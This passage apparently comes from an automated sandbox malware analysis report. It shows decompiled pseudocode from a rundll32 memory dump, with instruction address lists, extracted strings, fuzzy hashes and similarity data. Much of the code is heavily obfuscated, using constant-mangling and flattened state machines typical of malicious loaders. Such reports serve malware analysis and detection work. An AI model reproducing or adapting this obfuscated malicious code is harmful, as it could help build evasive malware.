				_v100 = _v100 | 0xc89f00a3;
				_v100 = _v100 ^ 0xc89f9ef6;
				_v16 = 0x20c7;
				_v16 = _v16 + 0xecf3;
				_v16 = _v16 ^ 0x00014c0a;
				_v40 = 0x76db;
				_v40 = _v40 >> 9;
				_v40 = _v40 + 0x6d1d;
				_v40 = _v40 ^ 0x000061d8;
				_v44 = 0x71d;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 + 0xff5b;
				_v44 = _v44 ^ 0x0000e72e;
				_v48 = 0x8b38;
				_v48 = _v48 ^ 0xf66aca43;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x905ecaad;
				_v12 = 0xfda7;
				_v12 = _v12 ^ 0xcb86e1f3;
				_v12 = _v12 ^ 0xcb86358a;
				_v52 = 0x79a1;
				_v52 = _v52 | 0x05e61714;
				_v52 = _v52 * 0x59;
				_v52 = _v52 ^ 0x0d220a4b;
				_v92 = 0x6d1;
				_v92 = _v92 ^ 0xaab1ecb0;
				_v92 = _v92 ^ 0x7a5f7ff4;
				_v92 = _v92 | 0x9dbc7c28;
				_v92 = _v92 ^ 0xddfeba29;
				_v4 = 0xb969;
				_v4 = _v4 + 0xffff29a6;
				_v4 = _v4 ^ 0xffffac55;
				_v8 = 0x80c1;
				_v8 = _v8 / _t297;
				_v8 = _v8 ^ 0x00007b2b;
				_v80 = 0x88c7;
				_t298 = 0x72;
				_v80 = _v80 * 0x11;
				_v80 = _v80 | 0x43e442c5;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x087de60e;
				_v84 = 0xaa5;
				_v84 = _v84 * 0x44;
				_v84 = _v84 / _t298;
				_t299 = 0x68;
				_v84 = _v84 / _t299;
				_v84 = _v84 ^ 0x00006b9b;
				_v88 = 0x4374;
				_v88 = _v88 >> 1;
				_v88 = _v88 + 0x8882;
				_t300 = 0x1f;
				_v88 = _v88 / _t300;
				_v88 = _v88 ^ 0x00003aab;
				_v36 = 0xe64;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 ^ 0x5e386e4c;
				_v36 = _v36 ^ 0x5e3850f6;
				while(1) {
					L1:
					_t280 = 0x220f80b2;
					while(1) {
						L2:
						_t301 = 0x34935044;
						do {
							L3:
							while(_t338 != 0x12347269) {
								if(_t338 == _t280) {
									_t282 = E001FD6D8(_v40, _v44, _t301, E001F213E, _v48, _t301, _t337, _t301, _t301, _v12, _v52);
									_t342 =  &(_t342[9]);
									 *((intOrPtr*)(_t337 + 4)) = _t282;
									__eflags = _t282;
									_t301 = 0x34935044;
									_t280 = 0x220f80b2;
									_t338 =  !=  ? 0x34935044 : 0x12347269;
									continue;
								}
								if(_t338 == 0x269b78c0) {
									_t283 = E001F8997(_v56, _v96, _v100, _v16,  *_t337);
									_t342 =  &(_t342[3]);
									 *((intOrPtr*)(_t337 + 0x1c)) = _t283;
									__eflags = _t283;
									_t280 = 0x220f80b2;
									_t338 =  !=  ? 0x220f80b2 : 0x12347269;
									L2:
									_t301 = 0x34935044;
									continue;
								}
								if(_t338 == 0x29978df7) {
									_push(_v28);
									_t284 = E001F5BE1(_v72, _t341, __eflags, _t301);
									 *_t337 = _t284;
									__eflags = _t284;
									if(__eflags == 0) {
										_t338 = 0x2b89b2cd;
									} else {
										E001F39D1(_v108, _v112,  *_t337, _v68, _t284);
										E001F56B3(_v24, _v60,  *_t337, _v104);
										_t342 =  &(_t342[7]);
										_t338 = 0x269b78c0;
									}
									while(1) {
										L1:
										_t280 = 0x220f80b2;
										goto L2;
									}
								}
								if(_t338 == 0x2b89b2cd) {
									return E001F91CD(_v80, _v84, _v88, _t337, _v36);
								}
								if(_t338 == 0x2fa674f5) {
									_push(_t301);
									_t313 = 0x24;
									_t290 = E002057E8(_t313);
									_t337 = _t290;
									__eflags = _t337;
									if(__eflags == 0) {
										return _t290;
									}
									_t338 = 0x29978df7;
									goto L1;
								}
								if(_t338 != _t301) {
									goto L19;
								}
								 *((intOrPtr*)(_t337 + 0x20)) = _t292;
								_t291 =  *0x211400; // 0x0
								 *((intOrPtr*)(_t337 + 0x10)) = _t291;
								 *0x211400 = _t337;
								return _t291;
							}
							E00208C8B(_v92, _v4, _v8,  *_t337);
							_t338 = 0x2b89b2cd;
							_t280 = 0x220f80b2;
							_t301 = 0x34935044;
							L19:
							__eflags = _t338 - 0x92c1d44;
						} while (__eflags != 0);
						return _t280;
					}
				}
			}

0x001f1658
0x001f165b
0x001f1663
0x001f1674
0x001f1678
0x001f167a
0x001f1684
0x001f168c
0x001f1692
0x001f1696
0x001f169b
0x001f16a1
0x001f16a9
0x001f16ae
0x001f16b6
0x001f16be
0x001f16c3
0x001f16cb
0x001f16d3
0x001f16db
0x001f16e3
0x001f16eb
0x001f16f0
0x001f16f8
0x001f1700
0x001f170d
0x001f170e
0x001f1712
0x001f171a
0x001f1722
0x001f1730
0x001f1734
0x001f1741
0x001f1745
0x001f174d
0x001f1755
0x001f175d
0x001f1765
0x001f176d
0x001f177a
0x001f177e
0x001f1786
0x001f1793
0x001f1797
0x001f179f
0x001f17a7
0x001f17ac
0x001f17b1
0x001f17b9
0x001f17c1
0x001f17c6
0x001f17ce
0x001f17d3
0x001f17db
0x001f17e3
0x001f17e8
0x001f17f0
0x001f17f8
0x001f1800
0x001f1808
0x001f180d
0x001f1812
0x001f181c
0x001f182a
0x001f182f
0x001f183a
0x001f183d
0x001f1841
0x001f1849
0x001f1851
0x001f1859
0x001f1861
0x001f1869
0x001f1871
0x001f1876
0x001f187e
0x001f1886
0x001f188e
0x001f1893
0x001f189b
0x001f18a3
0x001f18ab
0x001f18b3
0x001f18b8
0x001f18c0
0x001f18c8
0x001f18d0
0x001f18d8
0x001f18e0
0x001f18ed
0x001f18f1
0x001f18f9
0x001f1901
0x001f1909
0x001f1911
0x001f1919
0x001f1921
0x001f192c
0x001f1937
0x001f1942
0x001f1952
0x001f1956
0x001f195e
0x001f196b
0x001f196e
0x001f1972
0x001f197a
0x001f197f
0x001f1987
0x001f1994
0x001f19a0
0x001f19a8
0x001f19ad
0x001f19b3
0x001f19bb
0x001f19c3
0x001f19c7
0x001f19d3
0x001f19d6
0x001f19da
0x001f19e2
0x001f19ea
0x001f19ef
0x001f19f7
0x001f19ff
0x001f19ff
0x001f19ff
0x001f1a04
0x001f1a04
0x001f1a04
0x001f1a09
0x00000000
0x001f1a09
0x001f1a17
0x001f1b3c
0x001f1b41
0x001f1b44
0x001f1b47
0x001f1b4e
0x001f1b53
0x001f1b58
0x00000000
0x001f1b58
0x001f1a23
0x001f1aff
0x001f1b04
0x001f1b07
0x001f1b0a
0x001f1b11
0x001f1b16
0x001f1a04
0x001f1a04
0x00000000
0x001f1a04
0x001f1a2f
0x001f1a89
0x001f1a94
0x001f1a99
0x001f1a9d
0x001f1a9f
0x001f1ae3
0x001f1aa1
0x001f1ab4
0x001f1ad1
0x001f1ad6
0x001f1ad9
0x001f1ad9
0x001f19ff
0x001f19ff
0x001f19ff
0x00000000
0x001f19ff
0x001f19ff
0x001f1a37
0x00000000
0x001f1bab
0x001f1a43
0x001f1a6b
0x001f1a6e
0x001f1a6f
0x001f1a74
0x001f1a77
0x001f1a79
0x001f1bb5
0x001f1bb5
0x001f1a7f
0x00000000
0x001f1a7f
0x001f1a47
0x00000000
0x00000000
0x001f1a4d
0x001f1a50
0x001f1a55
0x001f1a58
0x00000000
0x001f1a58
0x001f1b71
0x001f1b78
0x001f1b7d
0x001f1b82
0x001f1b87
0x001f1b87
0x001f1b87
0x00000000
0x001f1a09
0x001f1a04

Strings

K", xrefs: 001F18F1
., xrefs: 001F189B
+{, xrefs: 001F1956
Ln8^, xrefs: 001F19EF
j, xrefs: 001F16AE
K", xrefs: 001F18E8
tC, xrefs: 001F19BB
`, xrefs: 001F17C6

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j$+{$.$K"$K"$Ln8^$tC$`
API String ID: 0-3859911108
Opcode ID: 8a076091ec837d83444066fad3629920b1cd34977f0c7f5628ec8e4083efeba6
Instruction ID: 91b9e69e9369cbcf3012beb05080ca6ea5585d0b7e595ccd45ba47ea9215d7d9
Opcode Fuzzy Hash: 8a076091ec837d83444066fad3629920b1cd34977f0c7f5628ec8e4083efeba6
Instruction Fuzzy Hash: B0D121725093819FE358CF29C48A41BFBF1BBD4748F108A0DF6A9962A0D7B58945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00290BCC, Relevance: 10.3, Strings: 8, Instructions: 285COMMON

Download Yara Rule

Strings

tC, xrefs: 00290F2F
`, xrefs: 00290D3A
K", xrefs: 00290E65
+{, xrefs: 00290ECA
., xrefs: 00290E0F
Ln8^, xrefs: 00290F63
K", xrefs: 00290E5C
j, xrefs: 00290C22

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j$+{$.$K"$K"$Ln8^$tC$`
API String ID: 0-3859911108
Opcode ID: a36814fe5c67ff6797a78f6cfc3183f0e6c3062a361df59afa4ef84246ac77bc
Instruction ID: 41ffa6826e826ebceafc0c7ea9c9d53ad7f157a720ebc20ba0899b204b4ca6df
Opcode Fuzzy Hash: a36814fe5c67ff6797a78f6cfc3183f0e6c3062a361df59afa4ef84246ac77bc
Instruction Fuzzy Hash: E1D142715183819FE758CF29C48A40BFBF1FBC4748F108A0EF599962A0DBB59959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0020D530, Relevance: 10.3, Strings: 8, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0020D530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				char _t277;
				void* _t302;
				void* _t313;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				intOrPtr _t353;
				signed int* _t356;

				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				_t277 = E001F56B2(0);
				_v72 = _t277;
				_t353 = _t277;
				_v140 = 0xcf77;
				_t356 =  &(( &_v180)[0xa]);
				_v140 = _v140 | 0x06dd099f;
				_v140 = _v140 ^ 0x2b3fcad2;
				_t313 = 0x28b49c8b;
				_v140 = _v140 ^ 0x2de2012d;
				_v164 = 0xc4bc;
				_v164 = _v164 << 9;
				_t344 = 9;
				_v164 = _v164 * 0x2c;
				_v164 = _v164 / _t344;
				_v164 = _v164 ^ 0x0783a020;
				_v112 = 0x2b8e;
				_v112 = _v112 + 0xffffae8b;
				_t345 = 0x76;
				_v112 = _v112 * 0x7c;
				_v112 = _v112 ^ 0xffedb6fa;
				_v144 = 0xac6;
				_v144 = _v144 / _t345;
				_t346 = 0x7c;
				_v144 = _v144 / _t346;
				_v144 = _v144 >> 3;
				_v144 = _v144 ^ 0x00001557;
				_v152 = 0xab69;
				_v152 = _v152 + 0xa2f;
				_v152 = _v152 >> 5;
				_v152 = _v152 + 0xffff79cf;
				_v152 = _v152 ^ 0xffff27b1;
				_v108 = 0x73cc;
				_v108 = _v108 + 0x480f;
				_t347 = 0x59;
				_v108 = _v108 / _t347;
				_v108 = _v108 ^ 0x000020fd;
				_v100 = 0x373b;
				_v100 = _v100 * 0x66;
				_v100 = _v100 ^ 0x0016182c;
				_v104 = 0xe7a6;
				_v104 = _v104 ^ 0xf29de3d2;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x000f640c;
				_v88 = 0x7bd1;
				_v88 = _v88 + 0xffff741d;
				_v88 = _v88 ^ 0xffffa91a;
				_v80 = 0x1764;
				_t348 = 0x17;
				_v80 = _v80 / _t348;
				_v80 = _v80 ^ 0x00004d9b;
				_v168 = 0x40e5;
				_v168 = _v168 | 0x95416268;
				_v168 = _v168 + 0xffffdda2;
				_t349 = 0x3d;
				_v168 = _v168 * 0x7e;
				_v168 = _v168 ^ 0x761d93b5;
				_v176 = 0x5c39;
				_v176 = _v176 << 3;
				_v176 = _v176 ^ 0x82f9fe57;
				_v176 = _v176 + 0xf301;
				_v176 = _v176 ^ 0x82fc4bf9;
				_v180 = 0x8c1a;
				_v180 = _v180 / _t349;
				_v180 = _v180 >> 0xf;
				_v180 = _v180 + 0x261d;
				_v180 = _v180 ^ 0x00004a95;
				_v124 = 0xc582;
				_t350 = 0x1d;
				_v124 = _v124 * 0x1f;
				_v124 = _v124 | 0xf6103699;
				_v124 = _v124 ^ 0xf617990a;
				_v156 = 0xd28e;
				_v156 = _v156 | 0xfa81b7f3;
				_v156 = _v156 << 9;
				_v156 = _v156 / _t350;
				_v156 = _v156 ^ 0x0022cbe3;
				_v96 = 0x6edc;
				_v96 = _v96 ^ 0x578c8574;
				_v96 = _v96 ^ 0x578c878c;
				_v172 = 0x2912;
				_t351 = 0x52;
				_v172 = _v172 * 0x42;
				_v172 = _v172 + 0xffffd848;
				_v172 = _v172 ^ 0xff29ff1d;
				_v172 = _v172 ^ 0xff239d47;
				_v116 = 0x4964;
				_v116 = _v116 + 0xffff6a3d;
				_v116 = _v116 << 8;
				_v116 = _v116 ^ 0xffb3a2b5;
				_v148 = 0x2770;
				_v148 = _v148 | 0xc18e9b46;
				_v148 = _v148 + 0xd34e;
				_v148 = _v148 | 0xf482d9fb;
				_v148 = _v148 ^ 0xf58f8d3b;
				_v76 = 0x8840;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x00221890;
				_v160 = 0xa0de;
				_v160 = _v160 / _t351;
				_v160 = _v160 + 0x938c;
				_v160 = _v160 + 0xffff507f;
				_v160 = _v160 ^ 0xffff887d;
				_v120 = 0xf500;
				_v120 = _v120 + 0xffff51ff;
				_v120 = _v120 * 0x5a;
				_v120 = _v120 ^ 0x0018abed;
				_v128 = 0xf1ed;
				_v128 = _v128 | 0x9ee1ceb0;
				_v128 = _v128 + 0xfdb4;
				_v128 = _v128 ^ 0x9ee2bb44;
				_v132 = 0xb4e7;
				_v132 = _v132 + 0x6d7b;
				_v132 = _v132 ^ 0xeb6cebb2;
				_v132 = _v132 ^ 0xeb6d8bab;
				_v136 = 0x4487;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 | 0x68b8f7cc;
				_v136 = _v136 ^ 0x68b888c6;
				_v84 = 0xd92;
				_v84 = _v84 + 0xffffee93;
				_v84 = _v84 ^ 0xfffffb14;
				_v92 = 0x6345;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x000649ac;
				do {
					while(_t313 != 0x36a85ef) {
						if(_t313 == 0x278fc742) {
							E001F1CB3( &_v68, _v108, 0x44, _v100);
							_push(0x1f13e0);
							_push(_v80);
							_t316 = _v104;
							_v68 = 0x44;
							_v60 = E0020BF25(_v104, _v88, __eflags);
							_t353 = E001F9BEB(_v168, _a20, _v72, _v104, _v176, _v180, _v164 | _v140, _a28, _t316, _t316,  &_v68, 0, _v124, _v156, _v96, _t316, _v172, _v116, _v148, _v76, _a8);
							E0020C5F7(_v160, _v120, _v128, _v132, _v60);
							_t356 =  &(_t356[0x1a]);
							_t313 = 0x2f47876d;
							continue;
						} else {
							if(_t313 == 0x28b49c8b) {
								_t313 = 0x36a85ef;
								continue;
							} else {
								if(_t313 != 0x2f47876d) {
									goto L12;
								} else {
									E0020B11F(_v136, _v72, _v84, _v92);
								}
							}
						}
						L6:
						return _t353;
					}
					_t302 = E001F3A7E(_v112, _v144, _t313,  &_v72, _v152, _a28);
					_t356 =  &(_t356[4]);
					__eflags = _t302;
					if(_t302 == 0) {
						_t313 = 0x349a93df;
						goto L12;
					} else {
						_t313 = 0x278fc742;
						continue;
					}
					goto L6;
					L12:
					__eflags = _t313 - 0x349a93df;
				} while (_t313 != 0x349a93df);
				goto L6;
			}

0x0020d53a
0x0020d543
0x0020d54a
0x0020d551
0x0020d558
0x0020d55f
0x0020d566
0x0020d56d
0x0020d574
0x0020d575
0x0020d576
0x0020d57b
0x0020d582
0x0020d584
0x0020d58c
0x0020d58f
0x0020d599
0x0020d5a1
0x0020d5a6
0x0020d5ae
0x0020d5b6
0x0020d5c2
0x0020d5c5
0x0020d5d1
0x0020d5d5
0x0020d5dd
0x0020d5e5
0x0020d5f2
0x0020d5f5
0x0020d5f9
0x0020d601
0x0020d611
0x0020d619
0x0020d61e
0x0020d624
0x0020d629
0x0020d631
0x0020d639
0x0020d641
0x0020d646
0x0020d64e
0x0020d656
0x0020d65e
0x0020d66a
0x0020d66d
0x0020d671
0x0020d679
0x0020d686
0x0020d68a
0x0020d692
0x0020d69a
0x0020d6a2
0x0020d6a7
0x0020d6af
0x0020d6b7
0x0020d6bf
0x0020d6c7
0x0020d6d7
0x0020d6dc
0x0020d6e2
0x0020d6ea
0x0020d6f2
0x0020d6fa
0x0020d707
0x0020d70a
0x0020d70e
0x0020d716
0x0020d71e
0x0020d723
0x0020d72b
0x0020d733
0x0020d73b
0x0020d74b
0x0020d74f
0x0020d754
0x0020d75c
0x0020d764
0x0020d771
0x0020d774
0x0020d778
0x0020d780
0x0020d788
0x0020d790
0x0020d798
0x0020d7a5
0x0020d7a9
0x0020d7b1
0x0020d7b9
0x0020d7c1
0x0020d7c9
0x0020d7d6
0x0020d7d7
0x0020d7db
0x0020d7e3
0x0020d7eb
0x0020d7f3
0x0020d7fb
0x0020d803
0x0020d808
0x0020d810
0x0020d818
0x0020d820
0x0020d828
0x0020d830
0x0020d838
0x0020d840
0x0020d845
0x0020d84d
0x0020d85b
0x0020d85f
0x0020d867
0x0020d86f
0x0020d877
0x0020d87f
0x0020d88c
0x0020d890
0x0020d898
0x0020d8a0
0x0020d8a8
0x0020d8b5
0x0020d8c2
0x0020d8cf
0x0020d8d7
0x0020d8df
0x0020d8e7
0x0020d8ef
0x0020d8f4
0x0020d8fc
0x0020d904
0x0020d90c
0x0020d914
0x0020d91c
0x0020d924
0x0020d929
0x0020d931
0x0020d931
0x0020d93b
0x0020d98d
0x0020d992
0x0020d997
0x0020d9a2
0x0020d9a6
0x0020d9c0
0x0020da27
0x0020da42
0x0020da47
0x0020da4a
0x00000000
0x0020d93d
0x0020d943
0x0020d978
0x00000000
0x0020d945
0x0020d94b
0x00000000
0x0020d951
0x0020d964
0x0020d96a
0x0020d94b
0x0020d943
0x0020d96c
0x0020d977
0x0020d977
0x0020da70
0x0020da75
0x0020da78
0x0020da7a
0x0020da83
0x00000000
0x0020da7c
0x0020da7c
0x00000000
0x0020da7c
0x00000000
0x0020da85
0x0020da85
0x0020da85
0x00000000

Strings

D, xrefs: 0020D9A6
9\, xrefs: 0020D716
;7, xrefs: 0020D679
p', xrefs: 0020D810
dI, xrefs: 0020D7F3
Ec, xrefs: 0020D91C
@, xrefs: 0020D6EA
{m, xrefs: 0020D8CF

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9\$;7$D$Ec$dI$p'${m$@
API String ID: 0-4186577645
Opcode ID: c0f8c20372bb79b4215585df0c0e7aad3c02528e7838f8068a1c9fc1512a3140
Instruction ID: fb870608cda697f6c10a0f6d1fc149d2b6a956d4baf3a4fdfdbd51d8099f1fd5
Opcode Fuzzy Hash: c0f8c20372bb79b4215585df0c0e7aad3c02528e7838f8068a1c9fc1512a3140
Instruction Fuzzy Hash: 2ED101B15087819FE364CF65C88AA1FFBE1BBC4344F108A1DF295962A0D7B58955CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00208F65, Relevance: 10.2, Strings: 8, Instructions: 246
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00208F65() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t253;
				signed int _t254;
				void* _t256;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				void* _t273;
				void* _t279;
				void* _t305;
				signed int* _t309;

				_t309 =  &_v108;
				_v12 = 0x296bf2;
				_v4 = 0;
				_v8 = 0x4bf1e;
				_v100 = 0x2b2b;
				_v100 = _v100 >> 2;
				_v100 = _v100 ^ 0x417d2759;
				_v16 = 0;
				_t10 =  &_v100; // 0x417d2759
				_v100 =  *_t10 * 0x44;
				_t305 = 0x7c03eab;
				_v100 = _v100 ^ 0xe5401b0d;
				_v76 = 0xb627;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0xc3e66578;
				_v76 = _v76 ^ 0xc3e6657f;
				_v104 = 0x24d5;
				_v104 = _v104 + 0x5447;
				_t265 = 0x57;
				_v104 = _v104 / _t265;
				_t266 = 0x28;
				_v104 = _v104 * 0x32;
				_v104 = _v104 ^ 0x000071f7;
				_v40 = 0x5f61;
				_v40 = _v40 + 0xd6ed;
				_v40 = _v40 ^ 0x000138b6;
				_v108 = 0x6b22;
				_v108 = _v108 * 0x6c;
				_v108 = _v108 << 8;
				_v108 = _v108 + 0x6d5c;
				_v108 = _v108 ^ 0x2d328325;
				_v92 = 0x5cf3;
				_v92 = _v92 | 0xe469743c;
				_v92 = _v92 ^ 0x31335b62;
				_v92 = _v92 >> 6;
				_v92 = _v92 ^ 0x0355473e;
				_v64 = 0xc70a;
				_v64 = _v64 + 0xfffff4c9;
				_v64 = _v64 ^ 0x3b15d897;
				_v64 = _v64 ^ 0x3b156e76;
				_v68 = 0xfd7d;
				_v68 = _v68 / _t266;
				_v68 = _v68 + 0x951;
				_v68 = _v68 ^ 0x00007938;
				_v96 = 0x3fdb;
				_t267 = 0x66;
				_v96 = _v96 / _t267;
				_v96 = _v96 | 0x3c76ff0b;
				_t268 = 0x58;
				_v96 = _v96 * 0x45;
				_v96 = _v96 ^ 0x4c12cf42;
				_v72 = 0x1a5;
				_v72 = _v72 | 0xb959885f;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000bb2ca;
				_v36 = 0x7797;
				_v36 = _v36 / _t268;
				_v36 = _v36 ^ 0x0000700b;
				_v28 = 0xb618;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x005b051c;
				_v88 = 0xdec6;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x6f8cff66;
				_t269 = 0x11;
				_t262 = _v16;
				_v88 = _v88 * 0x4e;
				_v88 = _v88 ^ 0xfcf5e555;
				_v32 = 0xe4b;
				_v32 = _v32 + 0x98e4;
				_v32 = _v32 ^ 0x00008bfc;
				_v60 = 0xce72;
				_v60 = _v60 >> 3;
				_v60 = _v60 | 0xda3ba74b;
				_v60 = _v60 ^ 0xda3bee01;
				_v48 = 0x9d97;
				_v48 = _v48 >> 0xf;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x000028e0;
				_v52 = 0x36fc;
				_t270 = 0x70;
				_v52 = _v52 / _t269;
				_v52 = _v52 * 0x6a;
				_v52 = _v52 ^ 0x00012e7b;
				_v56 = 0x3c40;
				_t271 = 0x4a;
				_v56 = _v56 / _t270;
				_v56 = _v56 / _t271;
				_v56 = _v56 ^ 0x000051af;
				_v84 = 0xe49b;
				_v84 = _v84 + 0xffff8d97;
				_t272 = 0x31;
				_v84 = _v84 * 0x39;
				_v84 = _v84 * 0x73;
				_v84 = _v84 ^ 0x0b6c29a9;
				_v24 = 0x471e;
				_v24 = _v24 | 0xb0cec10e;
				_v24 = _v24 ^ 0xb0cea202;
				_v44 = 0x7985;
				_v44 = _v44 * 0x70;
				_v44 = _v44 + 0xffff691b;
				_v44 = _v44 ^ 0x003485fc;
				_v80 = 0x185c;
				_t273 = 0x5c;
				_v80 = _v80 / _t272;
				_v80 = _v80 | 0x649be726;
				_v80 = _v80 + 0x7856;
				_v80 = _v80 ^ 0x649c793b;
				while(1) {
					L1:
					_t253 = 0xe31e6;
					do {
						while(_t305 != _t253) {
							if(_t305 == 0x7c03eab) {
								_t305 = 0x2ddc9b72;
								continue;
							} else {
								if(_t305 == 0x152cdf9c) {
									_push(0x1f1080);
									_push(_v108);
									_t256 = E0020BF25(_v104, _v40, __eflags);
									_pop(_t279);
									__eflags = E00203659(_v92, _v64, _v68, _v96, _v72, _t279,  &_v20, _v36, _t279, _t279, _t256, _t279, _v76, _v100);
									_t305 =  ==  ? 0xe31e6 : 0x7d7e766;
									E0020C5F7(_v28, _v88, _v32, _v60, _t256);
									_t309 =  &(_t309[0x10]);
									L16:
									_t253 = 0xe31e6;
									_t273 = 0x5c;
									goto L17;
								} else {
									if(_t305 == 0x2ddc9b72) {
										_t264 =  *0x2121b0 + 0x10;
										while(1) {
											__eflags =  *_t264 - _t273;
											if(__eflags == 0) {
												break;
											}
											_t264 = _t264 + 2;
											__eflags = _t264;
										}
										_t262 = _t264 + 2;
										_t305 = 0x152cdf9c;
										goto L1;
									} else {
										if(_t305 != 0x32e2c3ea) {
											goto L17;
										} else {
											E00205483(_v24, _v44, _v80, _v20);
										}
									}
								}
							}
							L8:
							return _v16;
						}
						_t254 = E001F79A2(_t262, _v48, _v52, _v56, _v84, _v20);
						_t309 =  &(_t309[4]);
						__eflags = _t254;
						_t305 = 0x32e2c3ea;
						_t225 = _t254 == 0;
						__eflags = _t225;
						_v16 = 0 | _t225;
						goto L16;
						L17:
						__eflags = _t305 - 0x7d7e766;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x00208f65
0x00208f68
0x00208f72
0x00208f78
0x00208f80
0x00208f88
0x00208f8d
0x00208f95
0x00208f99
0x00208fa2
0x00208fa6
0x00208fab
0x00208fb3
0x00208fbb
0x00208fc0
0x00208fc8
0x00208fd0
0x00208fd8
0x00208fe6
0x00208feb
0x00208ff6
0x00208ff9
0x00208ffd
0x00209005
0x0020900d
0x00209015
0x0020901d
0x0020902a
0x0020902e
0x00209033
0x0020903b
0x00209043
0x0020904b
0x00209053
0x0020905b
0x00209060
0x00209068
0x00209070
0x00209078
0x00209080
0x00209088
0x00209098
0x0020909c
0x002090a4
0x002090ac
0x002090b8
0x002090bd
0x002090c3
0x002090d0
0x002090d1
0x002090d5
0x002090dd
0x002090e5
0x002090ed
0x002090f2
0x002090fa
0x00209108
0x0020910c
0x00209114
0x0020911e
0x00209128
0x00209130
0x00209138
0x0020913d
0x0020914c
0x0020914f
0x00209153
0x00209157
0x0020915f
0x00209167
0x0020916f
0x00209177
0x0020917f
0x00209184
0x0020918c
0x00209194
0x0020919c
0x002091a1
0x002091a5
0x002091ad
0x002091bb
0x002091bc
0x002091c9
0x002091cd
0x002091d5
0x002091e3
0x002091e4
0x002091f2
0x002091f8
0x00209200
0x00209208
0x00209215
0x00209218
0x00209221
0x00209225
0x0020922d
0x00209235
0x0020923d
0x00209245
0x00209252
0x00209256
0x0020925e
0x00209266
0x00209274
0x00209275
0x00209279
0x00209281
0x00209289
0x00209291
0x00209291
0x00209291
0x00209296
0x00209296
0x002092a4
0x00209378
0x00000000
0x002092aa
0x002092ac
0x002092ff
0x00209304
0x00209310
0x00209316
0x0020934d
0x0020936b
0x0020936e
0x00209373
0x002093b0
0x002093b2
0x002093b7
0x00000000
0x002092ae
0x002092b4
0x002092eb
0x002092f3
0x002092f3
0x002092f6
0x00000000
0x00000000
0x002092f0
0x002092f0
0x002092f0
0x002092f8
0x002092fb
0x00000000
0x002092b6
0x002092bc
0x00000000
0x002092c2
0x002092d2
0x002092d8
0x002092bc
0x002092b4
0x002092ac
0x002092d9
0x002092e4
0x002092e4
0x00209398
0x0020939f
0x002093a2
0x002093a4
0x002093a9
0x002093a9
0x002093ac
0x00000000
0x002093b8
0x002093b8
0x002093b8
0x00000000
0x002093c4

Strings

Y'}A, xrefs: 00208F99
\m, xrefs: 00209033
@<, xrefs: 002091D5
(, xrefs: 002091A5
a_, xrefs: 00209005
8y, xrefs: 002090A4
b[31, xrefs: 00209053
Vx, xrefs: 00209281

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

